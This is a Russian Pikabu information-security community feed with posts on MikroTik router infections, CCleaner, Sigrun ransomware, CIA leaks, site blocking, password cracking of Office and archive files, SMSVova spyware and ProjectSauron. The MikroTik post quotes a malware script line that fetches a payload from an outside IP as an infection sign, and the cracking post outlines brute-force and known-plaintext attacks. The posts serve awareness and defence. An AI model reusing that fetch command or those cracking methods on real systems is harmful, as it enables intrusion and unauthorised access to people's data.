Сообщество - Информационная безопасность
Информационная безопасность
843 поста 18 224 подписчика
817

Принтеры - шпионы

В продолжение поста

Список цветных лазерных принтеров, которые возможно шпионят на ЦРУ.

Принтеры - шпионы ЦРУ, Принтер, Шпион, Лазер, Бэкдор, Информационная безопасность, Длиннопост
Принтеры - шпионы ЦРУ, Принтер, Шпион, Лазер, Бэкдор, Информационная безопасность, Длиннопост
Принтеры - шпионы ЦРУ, Принтер, Шпион, Лазер, Бэкдор, Информационная безопасность, Длиннопост

Полный список доступен по ссылке

Показать полностью 2
525

Уязвимости MikroTik

К сожалению скриншотов не будет. Будет сухой текст.

23 апреля 2018 года обнаружена уязвимость всех продуктов микротик на RouterOS.

Причем уязвимость позволяет узнать логин и  пароль, беспрепятственно войти в систему и сделать с роутером всё что угодно.

Всё бы было настолько буднично если бы 24 июля я не обнаружил бы на своем роутере и роутерах компании эту заразу. Распространяется очень быстро.

Характерные приметы: В System - scripts появляются посторонние скрипты, вот один из них:

/tool fetch address=95.154.216.164 port=2008 src-path=/mikrotik.php mode=http

В файлах соответственно mikrotik.php

Отключаются все запрещающие правила фаервола.

Создаются задачи в планировщике по запуску скрипта.

Открывается сокс-прокси на нестандартном порту.

Меняются адреса днс-серверов.

Т.е. микротик готовится к участию к какой-нибудь ддос-атаке или иным задачам по команде с сервака.


Самый оптимальный вариант - обновить прошивку микротика до RouterOS 6.40.8 [bugfix] or 6.42.1 [current] и откатиться из бекапа.

Если бекапа нет, но есть базовые познания то возможно выполнить команду export file=config_backup.rsc и уже на компьютере открыв в блокноте этот файл спокойно повыпиливать лишние строки. Сбросить роутер на заводские настройки и импортировать уже подрихтованный файл конфигурации.

Ну пару советов по безопасности:

IP - Services отключить все неиспользуемые сервисы. Для используемых жестко задать IP-адреса с которых они доступны. При желании сменить порты на нестандартные.

Грамотно настроить фаерволл.

В случае если факт взлома был зафиксирован - сменить пароль на микротик.


Подробнее здесь https://forum.mikrotik.com/viewtopic.php?t=133533

493

Хакеры взломали приложение CCleaner и использовали его для распространения вредоносных программ

Разработчики выпустили обновления для «скомпрометированных» версий и закрыли уязвимость.

Хакеры взломали приложение CCleaner и использовали его для распространения вредоносных программ Ccleaner, Взлом, Информационная безопасность, Троян

Компания Piriform заявила, что хакеры «скомпрометировали» две версии их популярного приложения CCLeaner для чистки и оптимизации компьютерных систем.: 32-битную CCleaner v5.33.6162 и CCleaner Cloud v1.07.3191. Разработчики отметили, что через них взломщики могли получить доступ к устройствам более двух миллионов пользователей.


Обе версии вышли в августе 2017 года, а о взломе стало известно 12 сентября. Хакеры поместили в CCleaner вредоносный софт, с помощью которого они могли получить удалённый доступ к устройствам, а также передать данные пользователей (имя компьютера, IP-адрес и список установленных приложений) на сервер в США.


К 15 сентября Piriform выпустила обновления для взломанных версий, а сервер был закрыт до того, как хакеры успели передать туда какую-либо информацию. В компании по кибербезопасности Talos назвали взлом «сложным» и сравнили его с вирусом NotPetya.


По словам представителей Piriform, «скомпрометированные» версии приложения обнаружили сотрудники компании Avast, которая приобрела Piriform в июле 2017 года. Из 130 миллионов пользователей CCleaner версию с вредоносными программами могли установить до 3% — это около двух миллионов человек.

Источник

1442

Автор вредоноса Sigrun бесплатно предоставил русскоязычным пользователям дешифровщик 

В случае с иностранными пользователями злоумышленник требует выкуп в размере $2,5 тыс. в криптовалюте.

Автор вредоноса Sigrun бесплатно предоставил русскоязычным пользователям дешифровщик  Хакеры, Вирус, Шифровальщик, Расшифровка, Россияне, Вымогательство, Sigrun

Разработчик вредоносного ПО Sigrun бесплатно предоставил пользователям, у которых русский язык указан в качестве основного, дешифровщик файлов. Об этом сообщил специалист по кибербезопасности Алекс Свирид (Alex Svirid) в соцсети Twitter.

Как следует из предоставленных одним из пользователей Twitter скриншотов, если в случае с американским пользователем злоумышленник потребовал выкуп в размере $2,5 тыс. в криптовалюте, то жертве из России хакер согласился помочь бесплатно.

Автор вредоноса Sigrun бесплатно предоставил русскоязычным пользователям дешифровщик  Хакеры, Вирус, Шифровальщик, Расшифровка, Россияне, Вымогательство, Sigrun
Вам не придется платить. Я просто помогу тебе


Как полагают специалисты, автор вредоносного ПО сам проживает на территории РФ и подобная тактика является попыткой избежать излишнего внимания со стороны правоохранительных органов.

Вредонос Sigrun представляет собой вымогательское ПО, которое после инфицирования компьютера требует у пользователей выкуп в криптовалюте за дешифровку данных.

https://www.securitylab.ru/news/493721.php

866

WikiLeaks опубликовала методы ЦРУ по взлому OC Windows

WikiLeaks опубликовала методы ЦРУ по взлому OC Windows Взлом, Windows, Wikileaks, Публикация, ЦРУ

WikiLeaks опубликовала очередную порцию секретных документов ЦРУ под названием Vault7. На этот раз на сайте выложено 27 документов, касающихся методов взлома операционной системы Windows.


Подборка, получившая название Grasshopper («Кузнечик»), содержит информацию об одноименном программном обеспечении ЦРУ для создания вредоносных модулей, которые предназначались для ОС Windows. Причем сотрудник ЦРУ использовал Grasshopper в качестве конструктора, узнав заранее технические подробности о цели взлома и задавая необходимые параметры. После этого Grasshopper создавал установочные модули для конкретных условий.

«Grasshopper — это программный инструмент для создания пользовательских инсталляционных пакетов для компьютеров, работающих под управлением Microsoft Windows», — говорится в руководстве.

В WikiLeaks отметили, что такие методы установки вредоносов позволяли им избегать обнаружения различными антивирусами, включая встроенный Windows Defender, антивирус от Symantec и Kaspersky Lab. В документах также замечено упоминание о банковском трояне Carberp, который был создан российскими хакерами в 2013 году.


Напомним, предыдущая часть выложенных документов WikiLeaks касалась способов взлома iPhone и MacBook. Всего «утечка» уже содержит около 9 тыс. секретных документов ЦРУ.

trashbox'ru/topics/108805/wikileaks-opublikovala-metody-cru-po-vzlomu-oc-windows

934

Россиянам запретили читать знаменитые научные сайты с российскими корнями

Роскомнадзор заблокировал доступ к скандально известному научному сайту Sci-Hub, созданному проживающей в России Александрой Элбакян. Одновременно заблокирован научный ресурс Genesis, также имеющий российские корни.

Россиянам запретили читать знаменитые научные сайты с российскими корнями Роскомнадзор, Блокировка, Библиотека, Sci-Hub, Интеллектуальная собственность, Genesis, Длиннопост

В России заблокированы Sci-Hub и LibGen

Роскомнадзор заблокировал доступ к научной библиотеке Sci-Hub. Об этом говорится в Telegram-канале Sci-Hub. Информация о блокировке ресурса подтверждается и данными из Реестра Роскомнадзора.


Основанием для блокировки стало определение Мосгорсуда, уполномоченного на блокировку пиратских ресурсов. С жалобой в суд обратилось научное издательство Springer Nature.


Согласно определению Мосгорсуда, блокировки должны быть подвергнуты восемь ресурсов. Два из них - это непосредственно Sci-Hib и его зеркало. Шесть остальных это научная поисковая система Library Genesis (LibGen) и ее зеркала (одно из них расположено на домене заблокированной ранее онлайн-библиотеки «Либрусек»).


Причиной обращения в суд стало незаконное размещение указанными ресурсами ряда научных статей: Effect of glucose-lowering therapies on heart failure («Влияние снижения уровня глюкозы на сердечную недостаточность»), Nitric oxide signalling in cardiovascular health and disease («Передача оксида азота при сердечно-сосудистых заболеваниях») и Lactate in the brain: from metabolic end-product to signalling molecule («Лактат в головном мозге: от метаболического конечного продукта до сигнальной молекулы»).


Как зарубежом боролись с Sci-Hub

Sci-Hub – англоязычный научный сайт, предоставляющий бесплатный сайт к более чем 60 млн статей. Создан проживающей в России Александрой Элбакян. Основательница Sci-Hub гражданка Казахстана, она пыталась получить российское гражданство, но безуспешно.


За рубежом ресурс давно подвергается преследованию со стороны правообладателей. В 2015 г. иск против сайта в суд Нью-Йорка выдвинуло американское издательство Elsevier. Издательство утверждало, что Sci-Hub незаконно использует аккаунты студентов и аспирантов для доступа к статьям через созданную Elsevieer платформу ScienceDirect


Суд присудил выплатить Elsevier $15 млн. Однако сервер Sci-Hub находился в Санкт-Петербурге, и решение суда его не затронуло. В 2017 г. иск против Sci-Hub в суд штата Вирджиниа выдвинула Американская химическая ассоциация. Суд постановил прекратить делегирование доменов Sci-Hub, предоставление ресурсы услуг хостинга, индексирование его поисковиками и т.д.


Sci-Hub лишился ряда своих доменов и возможности использовать ресурсы хостинг-провайдера CloudFlare. Но ресурс продолжает работать, меняя домены и IP-адреса.


Осенью 2017 г. Александра Элбакян прекратила доступ к Sci-Hub из России. Элбакян объяснила свои действия «оскорбительным поведением российских ученых» в ее адрес. После многочисленных просьб пользователей Элбакян возобновила доступ к Sci-Hub из России.


Как правообладатели боролись с LibGen

Другой заблокированный Роскомнадзором ресурс – поисковая система Genesis – содержит 50 млн статей. Сайт также является давним объектом охоты зарубежных правообладателей. В 2015 г. суд Великобритании обязал местных провайдеров блокировать доступ к нему.


В том же году суд Нью-Йорка по иску вышеупомянутого издательства Elsevier постановил изъять домен LibGen. Ресурс продолжил работать на другим доменах. В ходе судебных разбирательств утверждалось, что LibGen расположен на серверах в России и Нидерландах.


Источник http://www.cnews.ru/news/top/2018-11-19_roskomnadzor_zabloki...

С подачи слов А.Вассермана https://pikabu.ru/story/izvestnyiy_yerudit_prizval_otmenit_c...

Показать полностью
1142

Как надавать по рукам фишерам! Туториал.

Недавно прислал мне сообщение мой знакомый в стим.

Как надавать по рукам фишерам! Туториал. Фишинг, Туториал, Справедливость, Отражение, Длиннопост

Первым делом пытайтесь узнать, а на самом ли деле это ваш друг. Если явно это не так делайте следующее:

1. Копируем ссылку отправляем её на анализ в https://www.virustotal.com/

Как надавать по рукам фишерам! Туториал. Фишинг, Туториал, Справедливость, Отражение, Длиннопост

Даже если проверка показывает что ссылка чиста, то на самом деле это не так, это не так уже просто, по той простой причине, что сообщение вам отправил злоумышленник от имени вашего друга, преследуя определенные цели.

2. Переходим в доп. сведения и видим IP адрес подозрительного ресурса.

3. Смотри инфу по айпи с помощью любого сервиса.

Как надавать по рукам фишерам! Туториал. Фишинг, Туториал, Справедливость, Отражение, Длиннопост

4. Гуглим провайдера, чтобы раздобыть контакты службы поддержки.

5.

Как надавать по рукам фишерам! Туториал. Фишинг, Туториал, Справедливость, Отражение, Длиннопост

6. Создали заявку и ждем ответ.

7.

Как надавать по рукам фишерам! Туториал. Фишинг, Туториал, Справедливость, Отражение, Длиннопост

8.

Как надавать по рукам фишерам! Туториал. Фишинг, Туториал, Справедливость, Отражение, Длиннопост

Всем спасибо за внимание.

З.Ы. Бм ругался на последнюю картинку.

Показать полностью 3
244

В Android появится функция шифрования DNS трафика

В Android появится функция шифрования DNS трафика Android, DNS, DNS over TLS, Шифрование

DNS over TLS представляет собой экспериментальный протокол, шифрующий DNS трафик по принципу HTTPS.


Инженеры Google тестируют новую функцию для ОС Android, предназначенную для шифрования DNS-запросов и предотвращения перехвата трафика на сетевом уровне. Функционал, получивший название DNS over TLS , представляет собой экспериментальный протокол, шифрующий DNS трафик по принципу аналогичному работе HTTPS.


Цель DNS over TLS заключается в сокрытии DNS-запросов, которые делает пользователь. С точки зрения конфиденциальности это довольно важно, поскольку даже при использовании HTTPS атакующий может перехватывать DNS-запросы и выяснить, какие сайты посещает пользователь.


В настоящее время неясно, была ли добавлена поддержка данного функционала в Android или DNS over TLS появится в ближайшем обновлении, однако наличие опций включения/выключения говорит о том, что Google серьезно относится к тестированию данной функции.


Источник

1512

Русская пиратская церковь пожалуется в Верховный суд на блокировку Rutracker.org

Русская пиратская церковь (зарегистрирована как религиозная группа) планирует подать иск в Верховный суд к Роскомнадзору. Как рассказал Лайфу сам основатель церкви Владислав Петрушенко, целью иска является отмена решения Мосгорсуда, постановившего в 2015 году навечно заблокировать популярный торрент-трекер.
Русская пиратская церковь пожалуется в Верховный суд на блокировку Rutracker.org Rutracker, Пираты, Иск, Верховный суд, Новости, Длиннопост

"Rutracker был самым большим трекером в СНГ, то есть основным храмом пиратеистов (тех, кто исповедует пиратеизм. — Прим. Лайфа), — говорится в подготовленном представителями пиратской церкви иске. — Таким образом, Московский городской суд, принимая решение по вышеназванному делу, нарушил положения статьи 28 Конституции Российской Федерации, предусматривающей в России свободу совести и вероисповедания, фактически запретив пиратеистам проведение религиозных обрядов".


В Русской пиратской церкви пояснили, что "для адепта пиратеизма основным ритуалом является копирование информации, а Интернет — это "святая земля" для обмена информацией".


"На "святой земле" могут быть построены храмы, например, торрент-трекеры, онлайн-библиотеки, социальные сети, то есть сети обмена информацией. Чем больше и сложнее сеть обмена информацией, тем она священнее. Храмы в пиратеизме — это места копирования информации (сети обмена информацией), а обряды — это сам процесс копирования информации", — объясняется в заявлении в Верховный суд.

Кроме того, религиозная группа планирует обратиться в Генпрокуратуру РФ. В частности, согласно обращению, организация просит "провести проверку действий должностных лиц и руководства Роскомнадзора, в части организации блокировки торрент-трекера Rutracker.org на предмет наличия в таких действиях признаков административного правонарушения, предусмотренного статьёй 5.26 КоАП РФ".


Как сообщил Петрушенко, иск в Верховный суд и заявление в прокуратуру будут направлены на этой неделе. По его словам, если иск будет отклонён, то они обратятся в международный суд.

Русская пиратская церковь пожалуется в Верховный суд на блокировку Rutracker.org Rutracker, Пираты, Иск, Верховный суд, Новости, Длиннопост

В апреле 2014 года Русская пиратская церковь была официально зарегистрирована в Департаменте межрегионального сотрудничества и связей с религиозными организациями города Москвы. Она получила статус религиозной группы: представители могут получать пожертвования и беспрепятственно совершать обряды. В этом году РПЦ подаёт документы на регистрацию уже как религиозной организации, что позволит отстаивать свои интересы, например, по закону о защите чувств верующих.


В основе религии РПЦ идеи копимизма, то есть копирование и распространение информации, которые являются сакральными. Изначально подобное направление появилось в 2010 году в Швеции, где была основана Миссионерская церковь копимизма, выступающая за свободный файлообмен. В 2012 году её официально признали религией, хотя пиратство в Швеции по-прежнему незаконно.


По словам самого основателя РПЦ, финансированием церкви занимается само сообщество. При этом движение никак не связано с Пиратской партией России, которая также отстаивает свободу распространения информации в Интернете. Как рассказал Петрушенко, бывший председатель партии Павел Рассудов участвовал в создании РПЦ, но как частное лицо.


Как прокомментировал юрист "Роскомсвободы" (организация тоже подавала иск, оспаривающий блокировку Rutracker, но он был отклонён) Саркис Дарбинян, такой поворот дела "позволит заставить Верховный суд посмотреть чуть шире на проблему антипиратского закона и на порядок его применения в ущерб общественным интересам". По его словам, чем больше заявлений по этому поводу, "тем лучше".


Гендиректор ассоциации "Интернет-видео", объединяющей крупнейшие онлайн-кинотеатры Рунета, Алексей Бырдин не увидел в таком шаге какого-либо решения проблемы.

"Блокировка Rutracker задела пиратов за живое: их доходы явно упали, и их это серьёзно беспокоит. К сожалению, вместо конструктивного диалога по легализации ресурса мы видим очередной фарс", — считает он.

Независимый адвокат Роман Алымов отметил, что требования пиратеистов формально ничем не отличаются от, например, фотографирования на официальный документ в религиозном головном уборе, совершения различных паломничеств в общественных местах или проведения уроков религиозного образования в школах.


— Суду (если дело будет принято к производству) для правильного рассмотрения дела потребуется определить соотношение права на свободу вероисповедания и права на охрану интеллектуальной собственности. То же самое потребуется сделать сотрудникам прокуратуры, — сказал он.

Решение о вечной блокировке Rutracker было вынесено 9 ноября 2015 года по иску издательства "Эксмо". Были поданы несколько апелляций, в том числе "Роскомсвободы", но они были отклонены судом. Постановление о блокировке вступило в силу 22 января текущего года.

https://life.ru/t/технологии/890687/russkaia_piratskaia_tsie...
Показать полностью 1
1131

Взлом и защита паролей

Привет.
Это второй пост о криптоанализе.
Девиз поста: если каждый человек станет лучше в отдельности, то улучшится и весь мир.

Однако, к делу.
Сегодня:
1. Взлом пароля документа Microsoft Office.
(На примере Word 2003, аналогично с 2013 и также с excel и другими продуктами office)
2. Взлом пароля архива.
(На примере архива rar, аналогично с zip, 7z и другими)

Немного теории:
Полный перебор (брутфорс) - метод подбора криптографического ключа методом перебора всех заданных вариантов. (Кстати, шифр считается абсолютно криптостойким, если единственный возможный способ его взлома - полный перебор, причём, невозможно долгий).
Атака по словарю - перебор паролей по заранее заданному набору слов.
Атака по открытому тексту - вид криптоанализа, при котором в тексте присутствуют "подсказки" - известные фразы.

Обо всём подробнее, далее.

Хватит мучить вас текстом.
Но только один вопрос. Где по вашему хранятся пароли от файла? Ответ ниже.

Создадим документ в Word 2003 и поставим пароль "findme" на запись документа.

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

А теперь взглянем на файл через редактор кода.
Я использую для этого Total commander (можно и Far manager, начинал я с него).

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Ага! Пароль хранится в самом файле! Ничего удивительного, но нужно это помнить.
Конечно, только если поставить защиту на запись (и возможно только на word 2003 (2013 уже не имеет таких пробелов)), возможно найти пароль так легко и быстро.

Поэтому когда вы этот самый пароль заносите в файл, он шифруется (хэшируется). Поставим пароль на открытие файла "pikabu".

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

В данном случае, пароль уже невозможно так легко найти, он зашифрован.

2 минутки математики


Общее число паролей равно мощности алфавита в степени количества символов.
26 маленьких английских букв, столько же больших, 10 цифр, около 20 спец символов, а можно ещё и русский алфавит (да, word это поддерживает). Но предположим 80 символов - мощность алфавита. Да и 6 символов на весь пароль это 262144000000 (262 миллиарда 144 миллиона) паролей. Мой компьютер справился бы с таким объёмом за 54 часа. Но достаточно узнать или предположить, что вначале мы проверим только пароли из маленьких английских букв и получаем 308915776 (308 миллионов) паролей, что при той же скорости займёт всего 4 минуты.

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

И не надо забывать, что нам не надо проверять все 308 миллионов паролей. Обычно, он где-то в середине от всего числа:

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Именно так, обнаружив уязвимость в системе аутентификации iCloud, злоумышленники получили возможность совершить брутфорс атаку на аккаунты звёзд. Да, в Apple тупо не могли добавить два базовых пункта аутентификации: задержку при вводе неправильного пароля и ограничение попыток ввода.

Забавный факт. Вы можете поставить пароль на защиту от изменений test и открыть его с помощью VpQd или BBAb, (актуально для word 2013)
Или поставить пароль на защиту листа или книги в Excel test и открыть его с помощью zzyw.
Грубо говоря, это происходит, из-за того, что в зашифрованном виде эти пароли представляют одинаковый набор символов.

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Об архивах.

Для начала также поставим какой нибудь пароль на архив .rar, например, "123"

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

И как вы поняли, нету ничего сложного в том чтобы перебрать пароли в 3 символа, даже если скорость всего 211 паролей в секунду.

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Но далеко не все пользуются WinRAR'ом. Прежде чем вы вдруг решите заархивировать с паролем некие важные документы в zip (методом zipcrypto), посмотрите на скорость перебора пароля такого архива:

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Много текста :(

И не стоит также использовать настоящие слова. Сколько вот слов в русском языке? Миллиарды? Миллионы? Точно сказать не могу, язык динамичный, а всё же слов менее 1000000 (миллиона), или около того. А сколько времени займёт проверка миллиона паролей? Меньше секунды (меньше доли секунды).


Напоследок, я оставил кое-что интересное - атака по открытому тексту.

Итак, представьте.
Вы - большой начальник. Вам присылают очень важные документы, скажем текст вашей будущей компьютерной программы и документацию к нему. Вы открываете, редактируете план, ставите пароль и... случайно отправляете архив не тем лицам. Вы можете подумать, что всё в порядке, у вас там большой и сложный пароль в 9 символов.

Но не расслабляйтесь. Даже такой сложный пароль можно взломать. Вы ведь могли поставить пароль на распаковку, но не на просмотр названий файлов. (Кто вообще ставит пароль на просмотр названий файлов). А злоумышленник то посмотрит, увидит файл из общей библиотеки, зашифрует его тем же методом, что и вы, и получит пример для программы - подсказку. Зная, что данный документ таким образом шифруется в тексте, дешифратор сможет расшифровать весь текст.
Тем не менее, это актуально, если вы используете .zip .arj или старый .rar архив. Иначе используется иной метод шифрования. В общем случае достаточно знать последовательность символов длинной не меньше длины пароля.

Так взламывали немецкий шифратор Энигму - сообщения практически всегда начинались с Heil Hitler.
Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Затем

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Проверяем

Взлом и защита паролей Информационная безопасность, Пароль, Архив, Документы, Брутфорс, Гифка, Длиннопост

Ага, сложный пароль в 9 символов.

Это всё что я хотел рассказать сегодня. Совесть не позволяет выкладывать все программы, мало ли к кому они попадут. Пусть, если это и произойдёт, то не из моих рук.

Спасибо за внимание, надеюсь Вы заинтересуетесь защитой Ваших данных. Ведь это в первую очередь, нужно Вам. Пишите что вам не понравилось или понравилось в таком формате поста, чтобы я мог исправиться (нет, ахаха). Не много ли текста?

Рекомендации:

1. Ставьте пароль не английском языке! На русском, татарском, китайском, на любом, что способен переварить Word, но не на английском. Это сильно замедлит скорость подбора.


2. Ставьте пароль не менее 8 символов и комбинируйте регистры (zZ) и спец символы (=_-+) в вашем пароле. Даже старый пентиум способен подбирать по нескольку тысяч паролей в секунду. А ныне, пароли взламываются силами видеокарт, мощность вычислений, которых, превосходит разные Intel i7 в десятки раз. Каждый символ в вашем пароле снижает скорость взлома экспоненциально. Грамотно подобранный пароль длинной в 10 символов будет взламываться со скоростью 10 миллионов паролей в секунду 43585 лет.
12 символьный с той же скорость 293 миллиона лет.

Показать полностью 11
371

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update.

Специалисты компании Zscaler обнаружили в Google Play очередную малварь. И хотя вредоносы проникают в официальный каталог приложений с завидной регулярностью, как правило, они не задерживаются там надолго, в конечном счете, их обнаруживают либо сторонние исследователи, либо сами инженеры Google. Однако приложение System Update – это определенно не такой случай.



Исследователи сообщают, что System Update относится к шпионскому семейству SMSVova, и вредонос продержался в Google Play рекордные три года, появившись еще в 2014 году. В результате приложение успели скачать 1 000 000 – 5 000 000 раз, невзирая даже на тот факт, что описание приложения ограничивалось пустым белым скриншотом и строкой текста: «это приложение обновит и активирует специализированные функции, связанные с местоположением».

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост
Отзывы тоже нельзя было назвать положительными: большинство пользователей замечали подозрительное поведение System Update, потому как с их точки зрения приложение не делало ничего и попросту пропадало с экрана устройства сразу после первого запуска (не забыв продемонстрировать сообщение об ошибке).
Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост
Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост

Как уже было сказано выше, на самом деле это «системное обновление» представляло собой спайварь SMSVova. Во время первого запуска малварь активировала в фоновом режиме собственный Android-сервис и BroadcastReceiver, после чего шпионила за географическим местоположением пользователей, сохраняя эти данные в Shared Preferences.



Злоумышленники имели возможность наблюдать за входящими SMS-сообщениями через BroadcastReceiver, в частности, малварь искала в них строки vova- и get faq. Так, если атакующий присылал на скомпрометированный девайс сообщение с командой get faq, зараженное устройство отвечало списком команд, которые может выполнить. Все команды также передавались посредством SMS, с уже упомянутым префиксом vova-. К примеру: vova-set user password:’newpassword’.

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост

Малварь могла сообщить своим операторам не только данные о местоположении пользователя, но и сменить пароль устройства. Зачем именно злоумышленникам понадобились данные о геолокации, исследователи не уточняют, но пишут, что такая информация может быть использована «во множестве вредоносных сценариев».



Изучив исходные коды вредоноса, исследователи Zscaler пришли к выводу, что, возможно, это ранняя версия малвари DroidJack RAT – одного из наиболее известных троянов удаленного доступа для Android. Напомню, что DroidJack RAT появился в том же 2014 году и был основан на легитимном приложении Sandroid, которое по-прежнему доступно в официальном каталоге.

Малварь три года оставалась незамеченной в Google Play и маскировалась под System Update. Вирус, Android, Длиннопост
Судя по тому, что приложение System Update не обновлялось с декабря 2014 года, а также принимая во внимание его сходство с DroidJack RAT, аналитики предполагают, что это была одна из первых, тестовых попыток злоумышленников, когда они только проверяли, как можно обойти фильтры Google Play и пробраться в каталог приложений.
https://xakep.ru/2017/04/21/so-much-faked-system-update/
Показать полностью 4
785

Обнаружена Хак-группа PROJECTSAURON, скрывавшаяся в тени 5 лет

Исследователи «Лаборатории Касперского» рассказали об обнаружении ProjectSauron: наисложнейшей модульной платформы для кибершпионажа, использующей продвинутые методы сокрытия своего присутствия и извлечения собранных данных. По данным специалистов, одноименная группировка хакеров действует с 2011 года.


«Лаборатория Касперского» сообщает, что ProjectSauron (также известная под именами Strider или Remsec, как ее назвали исследователи Symantec) является одной из немногих по-настоящему мощных ATP-групп. Таких серьезных хакеров, в частности, отличает использование эксплойтов нулевого дня, применение неизвестных ранее векторов заражения, компрометация множества государственных организаций в разных странах, умение выкрадывать информацию из сетей, не подключенных к интернету, применение вредоносных модулей, работающих исключительно в памяти и не использующих жесткий диск и так далее.

Обнаружена Хак-группа PROJECTSAURON, скрывавшаяся в тени 5 лет Хакеры, Группа, Projectsauron, Лаборатория Касперского, Новости, Кибершпионаж, Длиннопост
Эксперты «Лаборатории Касперского» обнаружили ранее неизвестный вид атаки в сентябре 2015 года. Подозрительный модуль находился в системе в качестве исполняемой библиотеки, загруженной в память контроллера домена в сети под управлением Microsoft Windows. Библиотека была зарегистрирована как фильтр паролей для систем Windows и имела доступ к конфиденциальным данным в открытом виде. Эксперты провели расследование, в результате которого обнаружили следы деятельности ранее неизвестной кибергруппировки, ответственной за крупномасштабные атаки на ключевые государственные предприятия в нескольких странах, получившей название ProjectSauron. Выбор имени ProjectSauron для этой угрозы обусловлен тем, что авторы кода использовали слово «Sauron» в конфигурационных файлах.
Обнаружена Хак-группа PROJECTSAURON, скрывавшаяся в тени 5 лет Хакеры, Группа, Projectsauron, Лаборатория Касперского, Новости, Кибершпионаж, Длиннопост

Как оказалось, ProjectSauron — это наисложнейшая модульная платформа для кибершпионажа, использующая продвинутые методы сокрытия своего присутствия и извлечения собранных данных, что позволяет атакующим осуществлять продолжительные кампании. Технический анализ показал, что ее создатели «учились» у других организаторов АРТ-атак и сделали все возможное, чтобы не повторять их ошибок. Например, все вредоносные модули создаются специально «под конкретную жертву», что существенно уменьшает возможность их использования как индикаторов компрометации для любой другой жертвы.


В арсенале ProjectSauron присутствуют решения для атак на все современные ОС Microsoft Windows – как x64, так и x86. Также были обнаружены заражения как Windows XP x86, так и Windows 2012 R2 Server Edition x64. Версий ProjectSauron для систем, отличных от ОС Windows, обнаружено не было.


С помощью собственных средств телеметрии сотрудники «Лаборатории Касперского» выявили, что жертвами ProjectSauron стали уже более 30 организаций в Российской Федерации, Иране и Руанде. Хакеры атаковали правительственные структуры, научно-исследовательские центры, вооруженные силы, провайдеров телекоммуникационных услуг и финансовые организации. Исследователи пишут, что в реальности стран и организаций, пострадавших от ProjectSauron, скорее всего, намного больше.


Эксперты полагают, что группировка действовала как минимум с июня 2011 года и по-прежнему проявляет активность в 2016 году. Хотя имеются основания полагать, что хакеры в значительной мере свернули свою деятельность, угроза по-прежнему активна во многих компьютерных системах. Также эксперты убеждены, что операции такого уровня сложности, нацеленные на кражу конфиденциальной и секретной информации, могли быть реализованы только при поддержке государства.


В ходе расследования было выявлено, что в арсенале злоумышленников присутствовало несколько интересных и необычных техник, в том числе:

- извлечение собранных данных и передача информации о статусе атаки в режиме реального времени с помощью DNS-запросов;

- установка имплантов (вредоносных модулей) с помощью легитимных скриптов обновления ПО;

- извлечение данных из физически изолированных сетей с помощью специально подготовленных USB-носителей, с размещением украденных данных в скрытой области, недоступной стандартным средствам операционной системы;

- реализация основной платформы и ее плагинов на базе модифицированного скриптового движка Lua. Применение компонентов Lua во вредоносном ПО встречается очень редко – до настоящего времени они были обнаружены лишь в APT Flame и Animal Farm.


В отчете специалисты «Лаборатории Касперского» называют ProjectSauron чрезвычайно «продвинутой» платформой, достигающей уровня сложности таких проектов, как Regin и Equation. Среди наиболее интересных и сложных особенностей платформы аналитики отметили следующие вещи:

- различные механизмы извлечения информации, включая передачу данных поверх известных протоколов;

- преодоление воздушных зазоров с помощью скрытых разделов на USB-накопителях, созданных специально для переноса данных;

- компрометация механизмов LSA для взятия под контроль контроллеров доменов Windows;

- использование модифицированного скриптового движка Lua для создания собственных вредоносных скриптов, позволяющих управлять всей вредоносной платформой с помощью языка высокого уровня.


Особенно интересно, что экспертам удалось зафиксировать несколько случаев, когда ProjectSauron успешно проникал в физически изолированные сети. В состав инструментария ProjectSauron входит специальный модуль, предназначенный для переноса данных из физически изолированных сетей в системы, подключенные к интернету. Для этого используются съемные USB-устройства. После взлома подключенных к интернету систем злоумышленники ожидают подключения USB-накопителя к зараженной машине. Такие USB-накопители форматируются особым образом, чтобы уменьшить размер основного раздела на USB-диске. Освобожденное пространство (несколько сот мегабайт) используется злоумышленниками для создания нового зашифрованного раздела, недоступного для стандартных средств ОС Windows. Этот раздел несет в себе собственную виртуальную файловую систему (virtual file system, VFS) с двумя основными директориями – «In» (Входящие) и «Out» (Исходящие).


Такой метод позволяет успешно обойти защиту, обеспечиваемую многими DLP-продуктами, потому что ПО, блокирующее подключение неизвестных USB-устройств на основании DeviceID, не способно предотвратить атаку или утечку данных в случае, когда используется один из одобренных USB-накопителей, известных системе.


Конечно, реализация таких дорогих кампаний по кибершпионажу требовала разветвленной и сложной инфраструктуры доменов и серверов, каждый из которых был предназначен для конкретной жертвы и повторно не использовался. «Лаборатория Касперского» выявила 28 доменов, связанных с 11 IP-адресами в США и нескольких странах Европы, которые имеют отношение к группе ProjectSauron. Эксперт пишут, что разнородность интернет-провайдеров, выбранных для кампаний ProjectSauron, показывает, что группировка делала все возможное, чтобы избежать проведения атак по одной схеме.


С подробным отчетам о ProjectSauron можно ознакомиться здесь (PDF). Кроме того, отдельно доступен технический анализ (PDF).Также свою версию отчета представила компания Symantec, найти его можно здесь.

Показать полностью 1
1152

Пятикратное нажатие клавиши Shift на терминале «Сбербанка» позволяет попасть в систему

